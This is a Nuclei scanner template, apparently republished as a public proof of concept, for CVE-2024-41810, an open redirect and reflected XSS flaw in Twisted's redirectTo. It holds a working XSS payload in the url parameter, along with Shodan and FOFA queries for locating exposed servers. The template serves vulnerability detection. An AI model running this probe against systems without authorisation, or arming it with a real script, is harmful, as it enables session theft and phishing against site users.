Twisted is an event-based framework for internet applications, supporting Python 3.6+. The Twisted web framework's redirectTo function is vulnerable to reflected XSS if an attacker can control the redirect URL. This template tests for an open redirect and XSS vulnerability in the URL parameter. This vulnerability is fixed in 24.7.0rc1.
PoC代码[已公开]
id: CVE-2024-41810
info:
name: Twisted - Open Redirect & XSS
author: KoYejune0302,cheoljun99,sim4110,gy741
severity: medium
description: |
Twisted is an event-based framework for internet applications, supporting Python 3.6+. The Twisted web framework's redirectTo function is vulnerable to reflected XSS if an attacker can control the redirect URL. This template tests for an open redirect and XSS vulnerability in the URL parameter. This vulnerability is fixed in 24.7.0rc1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-41810
epss-score: 0.49083
epss-percentile: 0.9771
cpe: cpe:2.3:a:twistedmatrix:twisted:*:*:*:*:*:*:*:*
reference:
- https://github.com/advisories/GHSA-cf56-g6w6-pqq2
- https://nvd.nist.gov/vuln/detail/CVE-2024-41810
metadata:
max-request: 2
shodan-query: html:'Twisted' html:"python"
fofa-query: body="twisted" && "python"
tags: xss,redirect,twisted,python
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: response
words:
- "TWISTED_SESSION"
- '["Twisted'
internal: true
- method: GET
path:
- '{{BaseURL}}?url=ws://example.com/"><script>alert(document.domain)</script>'
redirects: true
matchers-condition: and
matchers:
- type: word
part: response
words:
- 'Location: ws://example.com/"><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 302
# digest: 490a00463044022003b98619d3df1b1c88822efdf58c6decfa5d7ffc46230e136b1867dd31fb49d50220696e19305d58d518073510ef65bb7f3945e58a142daab4bfc8a78eccfbc49cb8:922c64590222798bb761d5b6d8e72950